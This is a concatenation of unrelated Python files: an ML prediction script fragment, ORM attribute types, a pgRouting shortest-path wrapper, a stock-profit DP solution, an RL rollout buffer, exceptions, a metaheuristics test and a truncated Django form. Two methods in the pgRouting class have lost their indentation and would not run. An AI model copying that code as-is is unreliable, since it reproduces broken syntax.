        nnptest = nnmodel.predict(test[nnfilter])
        ptest[0, ccfilter] = ccptest
        # NOTE(review): nc rows reuse the negated cn predictions; presumably
        # valid because rows are interleaved original/mirror pairs -- confirm.
        ptest[0, cnfilter] = cnptest
        ptest[0, ncfilter] = -cnptest
        ptest[1, nnfilter] = nnptest
        ptest[2, :] = aptest
        ptest[3, :] = myptest
        wopt = [0.80, 1.00, 1.75, 1.75]
        print 'wopt = ', wopt
        predictions = np.dot(wopt, ptest)
    else:
        predictions = aptest
    output_filename = dataset + "_predict.csv"
    print("Writing predictions to " + output_filename)
    submission_dir = os.path.join(output_dir, output_filename)
    if symmetrize:
        # Keep only the original (even-indexed) rows, dropping the mirrors.
        write_predictions(submission_dir, test[0::2], predictions[0::2])
    else:
        write_predictions(submission_dir, test, predictions)
if __name__=="__main__":
    main()
|
import time
import uuid
import ujson
from wallace.db.base.attrs.base import DataType
class Boolean(DataType):
    """Boolean attribute; string inputs 'True'/'true'/'t' count as truthy."""
    cast = bool
    default = False

    @classmethod
    def typecast(cls, inst, val):
        # Strings are matched against a small whitelist; everything else
        # falls through to the generic bool() cast in the base class.
        if isinstance(val, basestring):
            return val in ('True', 'true', 't')
        return super(Boolean, cls).typecast(inst, val)
class ByteArray(DataType):
    """Attribute stored as a mutable bytearray."""
    cast = bytearray
class Float(DataType):
    """Floating-point attribute, defaulting to 0.0."""
    cast = float
    default = 0.0
class Integer(DataType):
    """Integer attribute, defaulting to 0."""
    cast = int
    default = 0
class Moment(Integer):
    """Integer timestamp attribute with no default value."""
    default = None
class Now(Moment):
    """Moment whose default is the current Unix time.

    The default is a callable; presumably DataType invokes it at write
    time so each record gets a fresh timestamp -- confirm in DataType.
    """
    default = lambda: int(time.time())
class String(DataType):
    """Byte-string attribute (Python 2 ``str``)."""
    cast = str
class Unicode(DataType):
    """Text attribute stored as a Python 2 ``unicode`` object."""
    cast = unicode
    @classmethod
    def typecast(cls, inst, val):
        # unicode(bytes) fails for non-ASCII input; fall back to an
        # explicit UTF-8 decode in that case.
        try:
            val = cls.cast(val)
        except UnicodeDecodeError:
            val = val.decode('utf-8')
        return super(Unicode, cls).typecast(inst, val)
class JSON(String):
    """Attribute persisted as a JSON string but exposed as a decoded value."""
    def __get__(self, inst, owner):
        # Stored form is the serialized string; decode on read. Falsy
        # values (None, '') are returned untouched.
        serialized = super(JSON, self).__get__(inst, owner)
        return ujson.loads(serialized) if serialized else serialized
    @classmethod
    def typecast(cls, inst, val):
        # Round-trip incoming strings through loads to normalize them.
        # Data arriving from the DB must already be valid JSON, so the
        # decode failure is re-raised in that direction only.
        if val and isinstance(val, basestring):
            try:
                val = ujson.loads(val)
            except TypeError:
                if inst._cbs_is_db_data_inbound:
                    raise
        # Re-serialize for storage; falsy values pass through unchanged.
        val = ujson.dumps(val) if val else val
        return super(JSON, cls).typecast(inst, val)
def is_uuid(val):
    """Return True if ``val`` parses as a UUID (any version)."""
    try:
        uuid.UUID(val)
    # TypeError/AttributeError cover non-string inputs (e.g. None, ints),
    # which uuid.UUID raises instead of ValueError; a validator should
    # report False for those rather than blow up.
    except (ValueError, TypeError, AttributeError):
        return False
    return True
def is_uuid4(val):
    """Return True if ``val`` parses as a version-4 (random) UUID."""
    try:
        val = uuid.UUID(val)
    # See is_uuid: non-string inputs raise TypeError/AttributeError from
    # uuid.UUID; treat them as "not a UUID4" instead of propagating.
    except (ValueError, TypeError, AttributeError):
        return False
    return val.version == 4
class UUID(String):
    """String attribute normalized to the bare 32-character hex UUID form."""
    validators = (is_uuid,)

    @classmethod
    def typecast(cls, inst, val):
        # Accept either a uuid.UUID instance or any UUID-formatted string;
        # both are reduced to .hex before delegating to the base class.
        normalized = val.hex if isinstance(val, uuid.UUID) else uuid.UUID(val).hex
        return super(UUID, cls).typecast(inst, normalized)
class UUID4(UUID):
    """UUID attribute restricted to version-4 (random) UUIDs."""
    validators = (is_uuid4,)
|
#!/usr/bin/env python
#
# Yang Liu (gloolar@gmail.com)
# 2016-08
#
# TODO
# - Node range check
# - Thinking about PgrNode as key: format node lat, lon precision?
import psycopg2
import psycopg2.extras
from collections import namedtuple
# from pprint import pprint
__all__ = ['PgrNode', 'PGRouting']
# A graph node: ``id`` is the pgRouting vertex id (None for free-floating
# geographic points); ``lon``/``lat`` are geographic coordinates.
PgrNode = namedtuple('PgrNode', ['id', 'lon', 'lat'])
class PGRouting(object):
    """Computing shortest paths and costs from nodes to nodes represented in
    geographic coordinates, by wrapping pgRouting.
    """
    # NOTE(review): these are *class-level* attributes. In particular,
    # __meta_data is a single dict shared by every instance unless a
    # method rebinds it on the instance.
    __conn = None
    __cur = None
    # default edge table definition
    __meta_data = {
        'table': 'ways',
        'id': 'gid',
        'source': 'source',
        'target': 'target',
        'cost': 'cost_s', # driving time in second
        'reverse_cost': 'reverse_cost_s', # reverse driving time in second
        'x1': 'x1',
        'y1': 'y1',
        'x2': 'x2',
        'y2': 'y2',
        'geometry': 'the_geom',
        'has_reverse_cost': True,
        'directed': True,
        'srid': 4326
    }
    def __init__(self, database, user, host='localhost', port='5432'):
        """Open the PostgreSQL connection used by all subsequent queries."""
        self.__connect_to_db(database, user, host, port)
    def __del__(self):
        # Best-effort cleanup when the instance is garbage collected.
        self.__close_db()
    def __connect_to_db(self, database, user, host, port):
        """(Re)connect to the database, closing any previous cursor/connection."""
        if self.__cur is not None and not self.__cur.closed:
            self.__cur.close()
        if self.__conn is not None and not self.__conn.closed:
            self.__conn.close()
        try:
            self.__conn = psycopg2.connect(database=database, user=user,
                                           host=host, port=port)
            # DictCursor lets results be addressed by column name.
            self.__cur = self.__conn.cursor(
                cursor_factory= psycopg2.extras.DictCursor)
        except psycopg2.Error as e:
            # Connection failures are only printed, not re-raised; the
            # instance is then left with no usable cursor.
            print(e.pgerror)
def __close_db(self):
if not self.__cur.closed:
self.__cur.close()
if not self.__conn.closed:
self.__conn.close()
    def __find_nearest_vertices(self, nodes):
        """Find nearest vertex of nodes on the way.
        Args:
            nodes: list of PgrNode.
        Returns:
            list of PgrNode (one nearest way-vertex per input node), or
            None as soon as any lookup fails or matches nothing.
        """
        # ORDER BY the_geom <-> point ... LIMIT 1 picks the closest vertex;
        # <-> is the PostGIS KNN distance ordering operator.
        sql = """
        SELECT id, lon::double precision, lat::double precision
        FROM {table}_vertices_pgr
        ORDER BY the_geom <-> ST_SetSRID(ST_Point(%s,%s),{srid})
        LIMIT 1
        """.format(table=self.__meta_data['table'],
                   srid=self.__meta_data['srid'])
        output = []
        for node in nodes:
            try:
                self.__cur.execute(sql, (node.lon, node.lat))
                results = self.__cur.fetchall()
                if len(results) > 0:
                    output.append(PgrNode(results[0]['id'],
                                          results[0]['lon'],
                                          results[0]['lat']))
                else:
                    print('cannot find nearest vid for ({}, {})'.format(
                        node[0], node[1]))
                    return None
            except psycopg2.Error as e:
                print(e.pgerror)
                return None
        return output
    def __node_distance(self, node1, node2):
        """Get distance between two nodes (unit: m).

        Returns None if the query fails.
        NOTE(review): values are interpolated into the SQL with str.format
        rather than bound parameters; fine for numeric PgrNode fields, but
        not safe if coordinates ever come from untrusted strings.
        """
        sql = """
        SELECT ST_Distance(
            ST_GeogFromText('SRID={srid};POINT({lon1} {lat1})'),
            ST_GeogFromText('SRID={srid};POINT({lon2} {lat2})')
        );
        """.format(srid=self.__meta_data['srid'],
                   lon1=node1.lon, lat1=node1.lat,
                   lon2=node2.lon, lat2=node2.lat)
        try:
            self.__cur.execute(sql)
            results = self.__cur.fetchall()
            return results[0][0]
        except psycopg2.Error as e:
            print(e.pgerror)
            return None
def set_meta_data(self, **kwargs):
"""Set meta data of tables if it is different from the default.
"""
for k, v in kwargs.items():
if not k in self.__meta_data.keys():
print("WARNNING: set_meta_data: invaid key {}".format(k))
continue
if not isinstance(v, (str, bool, int)):
print("WARNNING: set_meta_data: invalid value {}".format(v))
continue
self.__meta_data[k] = v
return self.__meta_data
    def dijkstra_cost(self, start_vids, end_vids):
        """Get all-pairs costs among way nodes without paths using
        pgr_dijkstraCost function.

        Args:
            start_vids, end_vids: lists of vertex ids in the edge table.
        Returns:
            dict mapping (start_vid, end_vid) -> agg_cost; empty dict on
            database error.
        """
        # Identifiers come from __meta_data (trusted configuration), the
        # vertex id lists are bound as real parameters.
        sql = """
        SELECT *
        FROM pgr_dijkstraCost(
            'SELECT {id} as id,
                {source} as source,
                {target} as target,
                {cost} as cost,
                {reverse_cost} as reverse_cost
            FROM {table}',
            %s,
            %s,
            {directed})
        """.format(
            table = self.__meta_data['table'],
            id = self.__meta_data['id'],
            source = self.__meta_data['source'],
            target = self.__meta_data['target'],
            cost = self.__meta_data['cost'],
            reverse_cost = self.__meta_data['reverse_cost'],
            directed = 'TRUE'
                       if self.__meta_data['directed']
                       else 'FALSE')
        try:
            self.__cur.execute(sql, (start_vids, end_vids))
            results = self.__cur.fetchall()
            return {(r['start_vid'], r['end_vid']) :
                    r['agg_cost'] for r in results}
        except psycopg2.Error as e:
            print(e.pgerror)
            return {}
    def dijkstra(self, start_vids, end_vids):
        """Get all-pairs shortest paths with costs among way nodes using
        pgr_dijkstra function.

        Args:
            start_vids, end_vids: lists of vertex ids in the edge table.
        Returns:
            dict mapping (start_vid, end_vid) -> {'path': [PgrNode, ...],
            'cost': total}; empty dict on database error.
        """
        sql = """
        SELECT *, v.lon::double precision, v.lat::double precision
        FROM
            pgr_dijkstra(
                'SELECT {id} as id,
                    {source} as source,
                    {target} as target,
                    {cost} as cost,
                    {reverse_cost} as reverse_cost
                FROM {edge_table}',
                %s,
                %s,
                {directed}) as r,
            {edge_table}_vertices_pgr as v
        WHERE r.node=v.id
        ORDER BY r.seq;
        """.format(
            edge_table = self.__meta_data['table'],
            id = self.__meta_data['id'],
            source = self.__meta_data['source'],
            target = self.__meta_data['target'],
            cost = self.__meta_data['cost'],
            reverse_cost = self.__meta_data['reverse_cost'],
            directed = 'TRUE'
                       if self.__meta_data['directed']
                       else 'FALSE')
        try:
            self.__cur.execute(sql, (start_vids, end_vids))
            results = self.__cur.fetchall()
            output = {}
            for r in results:
                # print r
                key = (r['start_vid'], r['end_vid'])
                if output.get(key, None) is None:
                    output[key] = {'path': [], 'cost': -1}
                output[key]['path'].append(
                    PgrNode(r['node'], r['lon'], r['lat']))
                # A negative edge marks the final row of a path in
                # pgRouting output; its agg_cost is the path total.
                if r['edge'] < 0:
                    output[key]['cost'] = r['agg_cost']
            return output
        except psycopg2.Error as e:
            print(e.pgerror)
            return {}
    def astar(self, start_vid, end_vid):
        """Get one-to-one shortest path between way nodes using pgr_AStar
        function.

        Args:
            start_vid, end_vid: single vertex ids in the edge table.
        Returns:
            dict with the single key (start_vid, end_vid) ->
            {'path': [PgrNode, ...], 'cost': total}; empty dict on error
            or when no path exists.
        """
        # reverse_cost is only included when the graph is directed AND the
        # table actually provides a reverse cost column.
        sql = """
        SELECT *, v.lon::double precision, v.lat::double precision
        FROM
            pgr_AStar(
                'SELECT {id}::INTEGER as id,
                    {source}::INTEGER as source,
                    {target}::INTEGER as target,
                    {cost} as cost,
                    {x1} as x1,
                    {y1} as y1,
                    {x2} as x2,
                    {y2} as y2
                    {reverse_cost}
                FROM {edge_table}',
                %s,
                %s,
                {directed},
                {has_rcost}) as r,
            {edge_table}_vertices_pgr as v
        WHERE r.id1=v.id
        ORDER BY r.seq;
        """.format(
            edge_table=self.__meta_data['table'],
            id = self.__meta_data['id'],
            source = self.__meta_data['source'],
            target = self.__meta_data['target'],
            cost = self.__meta_data['cost'],
            x1 = self.__meta_data['x1'],
            y1 = self.__meta_data['y1'],
            x2 = self.__meta_data['x2'],
            y2 = self.__meta_data['y2'],
            reverse_cost = ', {} as reverse_cost'.format(
                               self.__meta_data['reverse_cost'])
                           if self.__meta_data['directed'] and
                              self.__meta_data['has_reverse_cost']
                           else '',
            directed = 'TRUE'if self.__meta_data['directed'] else 'FALSE',
            has_rcost = 'TRUE'
                        if self.__meta_data['directed'] and
                           self.__meta_data['has_reverse_cost']
                        else 'FALSE')
        # print(sql)
        try:
            self.__cur.execute(sql, (start_vid, end_vid))
            results = self.__cur.fetchall()
            output = {}
            key = (start_vid, end_vid)
            for r in results:
                # print r
                if output.get(key, None) is None:
                    output[key] = {'path': [], 'cost': 0}
                output[key]['path'].append(PgrNode(r['id1'], r['lon'], r['lat']))
                # Rows with a real edge (id2 > 0) contribute their edge cost;
                # the terminal row does not.
                if r['id2'] > 0:
                    output[key]['cost'] += r['cost']
            return output
        except psycopg2.Error as e:
            print(e.pgerror)
            return {}
    def __get_one_to_one_routing(self, start_node, end_node, end_speed=10.0):
        """Get one-to-one shorest path using A* algorithm.
        Args:
            start_node and end_node: PgrNode.
            end_speed: speed from node to nearest vertex on way (unit: km/h)
        Returns:
            Routing dict with key (start_node, end_node), and path and cost
            in values. Cost is travelling time in second.

        NOTE(review): no error handling here -- if the vertex lookup or the
        A* query fails (returns None / {}), the indexing below raises.
        """
        if start_node == end_node:
            return {}
        end_speed = end_speed*1000.0/3600.0 # km/h -> m/s
        vertices = self.__find_nearest_vertices([start_node, end_node])
        # Approach legs: straight-line distance to the snapped vertex at
        # end_speed, added to the on-network travel time.
        node_vertex_costs = [
            self.__node_distance(start_node, vertices[0])/end_speed,
            self.__node_distance(end_node, vertices[1])/end_speed
        ]
        # routing between vertices
        main_routing = self.astar(vertices[0].id, vertices[1].id)
        routing = {(start_node, end_node) : {
                    'cost':
                        main_routing[(vertices[0].id, vertices[1].id)]['cost'] +
                        node_vertex_costs[0] +
                        node_vertex_costs[1],
                    'path':
                        [start_node] +
                        main_routing[(vertices[0].id, vertices[1].id)]['path'] +
                        [end_node] }
                  }
        return routing
    def __get_all_pairs_routings(self, start_nodes, end_nodes=None, end_speed=10.0):
        """Get all-pairs shortest paths from start_nodes to end_nodes with costs
        using Dijkstra algorithm.
        Args:
            start_nodes and end_nodes: lists of PgrNode. end_nodes=None means
                it is the same as start_nodes.
            end_speed: speed from node to nearest vertex on way (unit: km/h)
        Returns:
            A dict with key (start_node, end_node), and path and cost in
            values. Cost is travelling time with unit second.
        """
        end_speed = end_speed*1000.0/3600.0 # km/h -> m/s
        if end_nodes is not None:
            node_set = set(start_nodes) | set(end_nodes)
        else:
            node_set = set(start_nodes)
            end_nodes = start_nodes
        node_list = list(node_set)
        # Snap each distinct node to its nearest way vertex once, caching
        # the approach cost (straight-line distance / end_speed).
        vertices = self.__find_nearest_vertices(node_list)
        node_vertex = {node: {'vertex': vertex,
                              'cost': self.__node_distance(node, vertex)/end_speed}
                       for node, vertex in zip(node_list, vertices)}
        start_vids = [node_vertex[node]['vertex'].id for node in start_nodes]
        end_vids = [node_vertex[node]['vertex'].id for node in end_nodes]
        # routings from vertices to vertices on ways
        main_routings = self.dijkstra(start_vids, end_vids)
        # Total = approach leg + on-network path + departure leg.
        routings = {(start_node, end_node) : {
                        'cost':
                            main_routings[(node_vertex[start_node]['vertex'].id, node_vertex[end_node]['vertex'].id)]['cost'] +
                            node_vertex[start_node]['cost'] +
                            node_vertex[end_node]['cost'],
                        'path':
                            [start_node] +
                            main_routings[(node_vertex[start_node]['vertex'].id, node_vertex[end_node]['vertex'].id)]['path'] +
                            [end_node] }
                    for start_node in start_nodes
                    for end_node in end_nodes
                    if start_node != end_node}
        return routings
    def __get_all_pairs_costs(self, start_nodes, end_nodes=None, end_speed=10.0):
        """Get all-pairs shortest paths' costs without path details.
        Args:
            start_nodes and end_nodes: lists of PgrNode. end_nodes is None means
                it is the same as start_nodes.
            end_speed: speed from node to nearest vertex on way (unit: km/h).
        Returns:
            A dict with key (start_node, end_node), and values cost. Cost is
            travelling time in second.
        """
        end_speed = end_speed*1000.0/3600.0 # km/h -> m/s
        if end_nodes is not None:
            node_set = set(start_nodes) | set(end_nodes)
        else:
            node_set = set(start_nodes)
            end_nodes = start_nodes
        node_list = list(node_set)
        # Snap each distinct node once and cache the approach-leg cost.
        vertices = self.__find_nearest_vertices(node_list)
        node_vertex = {node: {'vertex': vertex,
                              'cost': self.__node_distance(node, vertex) / end_speed}
                       for node, vertex in zip(node_list, vertices)}
        start_vids = [node_vertex[node]['vertex'].id for node in start_nodes]
        end_vids = [node_vertex[node]['vertex'].id for node in end_nodes]
        # routings' costs from vertices to vertices on ways
        main_costs = self.dijkstra_cost(start_vids, end_vids)
        # total costs = main cost + two ends costs
        costs = {(start_node, end_node) :
                    main_costs[(node_vertex[start_node]['vertex'].id, node_vertex[end_node]['vertex'].id)] +
                    node_vertex[start_node]['cost'] +
                    node_vertex[end_node]['cost']
                 for start_node in start_nodes
                 for end_node in end_nodes
                 if start_node != end_node}
        return costs
    def get_routes(self, start_nodes, end_nodes, end_speed=10.0, gpx_file=None):
        """Get shortest paths from nodes to nodes.
        Args:
            start_nodes: PgrNode list for many nodes, or PgrNode for one node.
            end_nodes: PgrNode list for many nodes, or PgrNode for one node.
            end_speed: speed for travelling from end node to corresponding
                nearest node on the way.
            gpx_file: name of file for saving the paths as gpx format.
        Returns:
            A dict mapping node pair (start_node, end_node) to dict of
            corresponding path and cost. Path is a Pgrnode list, and cost is
            travelling time in second.
        """
        # Normalize single nodes to one-element lists.
        if not isinstance(start_nodes, list):
            start_nodes = [start_nodes]
        if not isinstance(end_nodes, list):
            end_nodes = [end_nodes]
        routes = {}
        # many-to-one or one-to-one: A* per start node
        if len(end_nodes) == 1:
            for start_node in start_nodes:
                r = self.__get_one_to_one_routing(start_node,
                                                  end_nodes[0],
                                                  end_speed)
                routes.update(r)
        # one-to-many or many-to-many: single all-pairs Dijkstra
        else:
            routes = self.__get_all_pairs_routings(start_nodes,
                                                   end_nodes,
                                                   end_speed)
        if gpx_file is not None:
            self.get_gpx(routes, gpx_file)
        return routes
    def get_costs(self, start_nodes, end_nodes, end_speed=10.0):
        """Get costs from nodes to nodes without paths.
        Args:
            start_nodes: PgrNode list for many nodes, or PgrNode for one node.
            end_nodes: PgrNode list for many nodes, or PgrNode for one node.
            end_speed: speed for travelling from end node to corresponding
                nearest node on the way.
        Returns:
            A dict mapping all node pairs (start_node, end_node) to
            corresponding costs. Cost is travelling time in second.
        """
        if not isinstance(start_nodes, list):
            start_nodes = [start_nodes]
        if not isinstance(end_nodes, list):
            end_nodes = [end_nodes]
        output = {}
        # many-to-one or one-to-one: reuse the routing path computation and
        # keep only the cost part of each entry.
        if len(end_nodes) == 1:
            for start_node in start_nodes:
                routing = self.__get_one_to_one_routing(start_node, end_nodes[0], end_speed)
                for k, v in routing.items():
                    output.update({k: v['cost']})
            return output
        return self.__get_all_pairs_costs(start_nodes, end_nodes, end_speed)
    def get_gpx(self, routes, gpx_file=None):
        """Get gpx representation of routes.
        Args:
            routes: routes returned by get_routes.
            gpx_file: name of file for saving gpx data.
        Returns:
            gpx string of paths in routes. Saved in gpx_file if it is specified.
        """
        output = ''
        output = output + "<?xml version='1.0'?>\n"
        output = output + ("<gpx version='1.1' creator='psycopgr' "
                           "xmlns='http://www.topografix.com/GPX/1/1' "
                           "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' "
                           "xsi:schemaLocation='http://www.topografix.com/GPX/1/1 "
                           "http://www.topografix.com/GPX/1/1/gpx.xsd'>\n")
        # One <trk> per routed pair; the segment carries every path node.
        for key, value in routes.items():
            output = output + " <trk>\n"
            output = output + " <name>{},{}->{},{}: {}</name>\n".format(
                key[0].lon,
                key[0].lat,
                key[1].lon,
                key[1].lat,
                value.get('cost', None))
            output = output + " <trkseg>\n"
            for node in value['path']:
                # print(node)
                output = output + " <trkpt lat='{}' lon='{}'>\n".format(
                    node.lat,
                    node.lon)
                output = output + " </trkpt>\n"
            output = output + " </trkseg>\n </trk>\n"
        output = output + "</gpx>\n"
        if gpx_file is not None:
            with open(gpx_file, "w") as f:
                f.write(output)
                print("gpx saved to {}".format(gpx_file))
        return output
def test1():
    """Manual smoke test of the raw vertex-id APIs against a sample DB."""
    pgr = PGRouting(database='pgroutingtest', user='herrk')
    pgr.set_meta_data(table='edge_table', id='id', cost='cost')
    costs = pgr.dijkstra_cost([2, 11], [3, 5])
    print("\nall-pairs costs:\n")
    print(costs)
    routings = pgr.dijkstra([2, 11], [3, 5])
    print("\nall-pairs paths with costs:\n")
    print(routings)
    routing = pgr.astar(11, 3)
    print("\none-to-one path:\n")
    print(routing)
def test2():
    """Manual test of astar/dijkstra plus GPX export on a real DB."""
    pgr = PGRouting(database='mydb', user='herrk')
    routing = pgr.astar(100, 111)
    print("\nrouting:\n")
    print(routing)
    routings = pgr.dijkstra([100, 400], [200, 600])
    print("\nroutings:\n")
    print(routings)
    gpx = pgr.get_gpx(routings, 'b.gpx')
    print(gpx)
def test5():
    """Compare batched (get_routes/get_costs) against pairwise results."""
    pgr = PGRouting(database='mydb', user='herrk')
    # Free-floating geographic points (id=None) around Beijing.
    nodes = [PgrNode(None, 116.30150, 40.05500),
             PgrNode(None, 116.36577, 40.00253),
             PgrNode(None, 116.30560, 39.95458),
             PgrNode(None, 116.46806, 39.99857)]
    routings = pgr.get_routes(nodes, nodes)
    # pprint(routings)
    costs = pgr.get_costs(nodes, nodes)
    # pprint(costs)
    keys = [(s, t) for s in nodes for t in nodes if s != t]
    for s, t in keys:
        r = pgr.get_routes(s, t)
        c = pgr.get_costs(s, t)
        print("\ncompare")
        print(routings[(s, t)]['cost'])
        print(costs[(s, t)])
        print(r[(s,t)]['cost'])
        print(c[(s,t)])
    s = nodes[0]
    t = nodes[3]
    r = pgr.get_routes(s, t, gpx_file='test/r-astar.gpx')
    c = pgr.get_costs(s, t)
    print(r[(s, t)]['cost'])
    print(c[(s, t)])
    pgr.get_gpx({(s, t): routings[(s, t)]}, gpx_file='test/r-dijkstra.gpx')
def main():
    """Manual-test entry point; requires a local PostGIS/pgRouting DB."""
    test5()
if __name__ == '__main__':
    main()
|
class Analysis:
    """Mutable record describing the analysis result of one query.

    Plain data holder with Java-style accessors. NOTE(review): only
    ``status``, ``minEditDistance`` and ``deviationFromMean`` are given
    defaults in ``__init__``; reading any other property (queryKey, score,
    explanation, ...) before its setter has run raises AttributeError.
    Idiomatic Python would expose plain attributes or a dataclass, but the
    get/set API is preserved for existing callers.
    """
    def __init__(self):
        self.status = "New"
        self.minEditDistance = 0
        self.deviationFromMean = 0
    def setQueryKey(self, queryKey):
        self.queryKey = queryKey
    def getQueryKey(self):
        return self.queryKey
    def setQueryValue(self, queryValue):
        self.queryValue = queryValue
    def getQueryValue(self):
        return self.queryValue
    def setQueryID(self, queryID):
        self.queryID = queryID
    def getQueryID(self):
        return self.queryID
    def setScore(self, score):
        self.score = score
    def getScore(self):
        return self.score
    def setExplanation(self, explanation):
        self.explanation = explanation
    def getExplanation(self):
        return self.explanation
    def setProbability(self, probability):
        self.probability = probability
    def getProbability(self):
        return self.probability
    def setSuggestion(self, suggestion):
        self.suggestion = suggestion
    def getSuggestion(self):
        return self.suggestion
    def setMinEditDistance(self, minEditDistance):
        self.minEditDistance = minEditDistance
    def getMinEditDistance(self):
        return self.minEditDistance
    def setDeviationFromMean(self, deviationFromMean):
        self.deviationFromMean = deviationFromMean
    def getDeviationFromMean(self):
        return self.deviationFromMean
    def setStatus(self, status):
        self.status = status
    def getStatus(self):
        return self.status
class Solution:
    """
    @param prices: a list of integers
    @return: return a integer
    """
    def maxProfit(self, A):
        """Max profit with unlimited transactions and a 1-day sell cooldown.

        DP with two states per day: f[i][0] = best profit after day i with no
        stock, f[i][1] = best profit after day i holding stock (the profit is
        accumulated through day-to-day price deltas). Buying after a sale
        requires one idle day, hence f[i][1] may come from f[i-2][0]; the
        very first buy has no cooldown, hence the i == 1 special case.
        """
        n = len(A)
        # BUG FIX: the original used -sys.maxsize but ``sys`` was never
        # imported in this file; float('-inf') is the idiomatic sentinel
        # and needs no import. Reachable results stay plain ints.
        NEG_INF = float('-inf')
        f = [[NEG_INF] * 2 for _ in range(n + 1)]
        f[0][0] = 0
        for i in range(1, n + 1):
            # continue without stock
            f[i][0] = max(f[i][0], f[i - 1][0])
            # sell today (realize yesterday-to-today price delta)
            if i > 1:
                f[i][0] = max(f[i][0], f[i - 1][1] + A[i - 1] - A[i - 2])
            if i > 1:
                # continue with stock
                f[i][1] = max(f[i][1], f[i - 1][1] + A[i - 1] - A[i - 2])
            if i > 1:
                # buy today (previous sale must be >= 2 days ago: cooldown)
                f[i][1] = max(f[i][1], f[i - 2][0])
            if i == 1:
                # special case, the first "buy" doesn't need cooldown
                f[i][1] = max(f[i][1], f[i - 1][0])
        return f[n][0]
"""
无限多次,只需要两个数组分别记录有股票和没有股票即可。一个特例:第一次买不需要cooldown
1. zhuang tai:
2. fang cheng: f[i][0] = max(f[i-1][0],
f[i-1][1] + Pi-1 - Pi-2)
f[i][1] = max(f[i-1][1] + Pi-1 - Pi-2 ,
f[i-2][0])
3. chu shi: f[0][0] = 0
f[0][1] = -inf
4. da an: f[0][n]
""" |
import torch
class RolloutStorage(object):
    """Fixed-size circular buffer of rollout data for on-policy RL updates.

    ``action_space`` is accepted for interface compatibility but unused.
    """

    def __init__(self, nsteps, num_processes, obs_shape, action_space):
        # obs/returns/masks get one extra slot so index ``nsteps`` can hold
        # the bootstrap state/mask produced after the final step.
        extended = nsteps + 1
        self.obs = torch.zeros(extended, num_processes, *obs_shape)
        self.returns = torch.zeros(extended, num_processes, 1)
        self.masks = torch.ones(extended, num_processes, 1)
        self.rewards = torch.zeros(nsteps, num_processes, 1)
        self.value_preds = torch.zeros(nsteps, num_processes, 1)
        self.action_log_probs = torch.zeros(nsteps, num_processes, 1)
        self.actions = torch.zeros(nsteps, num_processes, 1)
        self.nsteps = nsteps
        self.step = 0

    def insert(self, obs, actions, action_log_probs,
               value_preds, rewards, masks):
        """Store one transition at the current write position."""
        cur = self.step
        # Next observation/mask belong to the *following* time index.
        self.obs[cur + 1].copy_(obs)
        self.masks[cur + 1].copy_(masks)
        self.actions[cur].copy_(actions)
        self.action_log_probs[cur].copy_(action_log_probs)
        self.value_preds[cur].copy_(value_preds)
        self.rewards[cur].copy_(rewards)
        self.step = (cur + 1) % self.nsteps

    def after_update(self):
        """Carry the last obs/mask over as the start of the next rollout."""
        self.obs[0].copy_(self.obs[-1])
        self.masks[0].copy_(self.masks[-1])

    def compute_returns(self, next_value, gamma):
        """Fill ``self.returns`` with discounted returns, bootstrapped from
        ``next_value``; masks zero out the discounting at episode ends."""
        self.returns[-1] = next_value
        for t in range(self.rewards.size(0) - 1, -1, -1):
            self.returns[t] = self.returns[t + 1] * gamma * self.masks[t + 1] + self.rewards[t]

    def feed_forward_generator(self, advantages):
        raise NotImplementedError
|
'''
exceptions.py: exceptions defined by Martian
Authors
-------
Michael Hucka <mhucka@caltech.edu> -- Caltech Library
Copyright
---------
Copyright (c) 2019-2021 by the California Institute of Technology. This code
is open-source software released under a 3-clause BSD license. Please see the
file "LICENSE" for more information.
'''
class UserCancelled(Exception):
    '''The user elected to cancel/quit the program.'''
    pass
class ServiceFailure(Exception):
    '''Unrecoverable problem involving network services.'''
    pass
class NoContent(Exception):
    '''Server returned a code 401 or 404, indicating no content found.'''
    # NOTE(review): HTTP 401 is "unauthorized", not "no content" -- verify
    # that grouping 401 with 404 here is intentional.
class RateLimitExceeded(Exception):
    '''The service reports that its rate limits have been exceeded.'''
    pass
class InternalError(Exception):
    '''Unrecoverable problem involving Martian itself.'''
    pass
class RequestError(Exception):
    '''Problem with the TIND query or request.'''
    pass
|
import os
import random
import sys
import time
import unittest
import numpy as np
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
from codes.problem import Problem
class MockProblem(Problem):
    """Minimal 4-dimensional binary-sum problem for exercising the algorithms.

    The score is the number of coordinates that round to 1, so the known
    optimum is 4.
    """
    def __init__(self):
        # BUG FIX: the original called ``super().__init__(self, 4)`` --
        # the zero-argument super() form already binds ``self``, so it was
        # being passed twice. Problem presumably takes just the
        # dimensionality here -- confirm against Problem.__init__.
        super().__init__(4)
        self.MIN_VAL = 0
        self.MAX_VAL = 1
    def init(self):
        pass
    def eval(self, np_arr):
        np_arr = np.round(np_arr)  # binarize to 0/1
        return np_arr.sum()
    def view(self, np_arr):
        pass
from codes.algorithms.ABC import ABC
from codes.algorithms.Bat import Bat
from codes.algorithms.Cuckoo import Cuckoo
from codes.algorithms.Cuckoo_greedy import Cuckoo_greedy
from codes.algorithms.DE import DE
from codes.algorithms.Firefly import Firefly
from codes.algorithms.GA import GA
from codes.algorithms.GA_BLXa import GA_BLXa
from codes.algorithms.GA_SPX import GA_SPX
from codes.algorithms.Harmony import Harmony
from codes.algorithms.PfGA import PfGA
from codes.algorithms.PSO import PSO
from codes.algorithms.Tabu import Tabu
from codes.algorithms.WOA import WOA
class Test(unittest.TestCase):
    """Smoke-test every metaheuristic on the 4-bit MockProblem.

    Each optimizer runs 100 steps; it must evaluate the objective at least
    10 times and reach the known optimum score of 4.
    """
    def test_1(self):
        test_patterns = [
            ABC(10),
            Bat(10),
            Cuckoo(10),
            Cuckoo_greedy(10),
            DE(10),
            Firefly(10),
            GA(10),
            PfGA(),
            Harmony(10),
            PSO(10),
            WOA(10),
            GA_BLXa(10),
            GA_SPX(10),
            Tabu(10),
        ]
        for o in test_patterns:
            # subTest keeps one algorithm's failure from hiding the others.
            with self.subTest(alg=o):
                o.init(MockProblem())
                for _ in range(100):
                    o.step()
                self.assertTrue(o.count >= 10)
                self.assertEqual(o.getMaxScore(), 4)
if __name__ == "__main__":
    unittest.main()
|
from django import forms
from django.forms import ModelForm
from cliente.models import Cliente
class RegisterCliente(forms.ModelForm):
    """ModelForm exposing the Cliente registration fields."""

    class Meta:
        model = Cliente
        fields = [
            "nombre",
            "apellido_paterno",
            "apellido_materno",
            "correo",
            "telefono",
            "fecha_instalacion",
            "is_activo",
            "departamento",
            "puntoenlace",
            "user",
